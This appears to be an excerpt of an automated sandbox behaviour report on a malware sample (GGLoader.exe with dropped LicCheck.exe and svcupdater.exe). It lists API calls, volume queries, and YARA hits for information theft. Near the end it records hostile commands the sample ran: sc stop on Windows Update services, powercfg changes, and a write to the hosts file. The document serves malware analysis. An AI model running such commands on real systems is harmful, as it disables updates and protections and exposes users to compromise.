Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_007BD7FD
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007B4CBB
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_007BCE99
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW, 35_2_00C051E1
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C0D186
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C0D13B
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 35_2_00C0D2AC
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C0D221
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW, 35_2_00C0D4FF
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 35_2_00C0D628
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 35_2_00C0D7FD
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW, 35_2_00C0D72E
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C04CBB
Source: C:\Users\user\Desktop\GGLoader.exe Queries volume information: C:\Users\user\Desktop\GGLoader.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 42_2_0000000140001C64
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5A60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_007A5A60
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007946E0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA, 6_2_007946E0
Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc

Stealing of Sensitive Information

Source: Yara match File source: 00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 7904, type: MEMORYSTR